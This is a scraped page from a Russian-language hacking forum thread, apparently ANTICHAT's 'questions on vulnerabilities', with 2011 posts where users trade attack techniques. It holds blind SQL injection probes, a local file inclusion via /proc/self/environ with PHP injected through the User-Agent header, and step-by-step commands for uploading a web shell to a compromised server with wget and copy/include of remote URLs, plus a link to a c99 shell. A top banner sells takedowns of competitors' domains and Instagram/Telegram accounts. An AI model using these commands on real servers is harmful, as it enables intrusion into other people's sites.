УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1791 из 2438

1791

Опции темы

Поиск в этой теме

Опции просмотра

#17901

15.08.2011, 14:09

oODungVTOo

Guest

Сообщений: n/a

Провел на форуме:
33429

Репутация: 0

SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0) MySQL 5

SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0) MySQL 4

I don't see difference at this page........can u help me?

#17902

15.08.2011, 15:58

Melfis

Guest

Сообщений: n/a

Провел на форуме:
195266

Репутация: 53

Цитата:

Сообщение от oODungVTOo

oODungVTOo said:
SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0) MySQL 5
SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0) MySQL 4
I don't see difference at this page........can u help me?

The second option displaying "Madre e Hijo Nesk". The first option doesn't show anything

#17903

15.08.2011, 21:29

Sloneny

Новичок

Регистрация: 08.03.2010

Сообщений: 0

Провел на форуме:
11373

Репутация: 0

Отправить сообщение для Sloneny с помощью ICQ

file=../../../../../proc/self/environ

выводит содержимое файла.

через Tamper записываю

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]

пытаюсь подключить,

file=../../../../../proc/self/environ&e=e=phpinfo();

просто выводит водержимое.

Где-то сделал ошибку? Или есть обязательные условия для работы такой конструкции?

#17904

15.08.2011, 21:33

chaby

Guest

Сообщений: n/a

Провел на форуме:
1179

Репутация: -5

люди имею доступ к выполнению команд на сервере index.php?cmd=echo 123

а какой командой мне загрузить шелл подскажите плиз

#17905

15.08.2011, 21:39

d1v

Новичок

Регистрация: 21.02.2009

Сообщений: 3

Провел на форуме:
58401

Репутация: 0

Цитата:

Сообщение от chaby

chaby said:
люди имею доступ к выполнению команд на сервере index.php?cmd=echo 123
а какой командой мне загрузить шелл подскажите плиз

index.php?cmd=wget http://site.ru/shell.txt -O shell.php

#17906

15.08.2011, 21:42

chaby

Guest

Сообщений: n/a

Провел на форуме:
1179

Репутация: -5

люди имею доступ к выполнению команд на сервере index.php?cmd=echo 123

а какой командой мне загрузить шелл подскажите плиз

КТО ПОДСКАЖЕТ ПОДЕЛЮСЬ ШЕЛЛОМ

#17907

15.08.2011, 21:43

ne0k

Guest

Сообщений: n/a

Провел на форуме:
10960

Репутация: 0

Цитата:

Сообщение от chaby

посмотри стоит ли wget: index.php?cmd=whereis wget

Если стоит, делай так:

wget http://address/shell.txt -O /path/to/shell/shell.php

з.ы. Папка в которую заливаешь шелл, должна быть открыта на запись. Посмотреть можешь так:

index.php?cmd=ls -la

#17908

15.08.2011, 21:53

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Цитата:

Сообщение от Sloneny

Sloneny said:
file=../../../../../proc/self/environ
выводит содержимое файла.
через Tamper записываю

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]

пытаюсь подключить,
file=../../../../../proc/self/environ&e=e=phpinfo();
просто выводит водержимое.
Где-то сделал ошибку? Или есть обязательные условия для работы такой конструкции?

передай в заголовке User-agent.

Цитата:

Сообщение от chaby

chaby said:
люди имею доступ к выполнению команд на сервере index.php?cmd=echo 123
а какой командой мне загрузить шелл подскажите плиз
КТО ПОДСКАЖЕТ ПОДЕЛЮСЬ ШЕЛЛОМ

Сделай так:

1. index.php?cmd=phpinfo();

если выведет результат команды phpinfo (ты это увидешь), то выполни такую команду index.php?cmd=copy($_GET,$_GET[o]);&s=ссылка_на_шелл&o=/tmp/sss.php и шелл скопируется в /tmp/sss.php

дальше делаешь: index.php?cmd=include($_GET);&s=/tmp/sss.php

2. index.php?cmd=ls -la

если выведется содержимое текущего каталога, то выполни index.php?cmd=wget -O sss.php ссылка_на_шелл

шел скопируется в текущую диру, и потом просто открой sss.php

Соответственно сработает если хватит прав на запись.

#17909

15.08.2011, 22:02

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Цитата:

Сообщение от chaby

chaby said:
права на запись есть и шщел есть мне его не куда залить чтоб прямую сылку получить

http://madnet.name/files/download/9_c99madshell.php

p.s. Твой вопрос разжеван. Увижу еще один вопрос касающийся этого вопроса от тебя, посты все тру, тебя баню.

#17910

15.08.2011, 23:34

promarketing

Guest

Сообщений: n/a

Провел на форуме:
3814

Репутация: 0

Posovetuite please web shell kotoriy rabotaet s Oracle bazoy. Est' webshell, mogy gryzit' faili, est' vsya infa dlya konnekta k oracle db. kak posmotret' kakie tam tablicy hotyabi?

Iz etogo topika nechego rabotyeshego vrode ne nashel /thread246807.html

Spasibo

Страница 1791 из 2438

1791

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход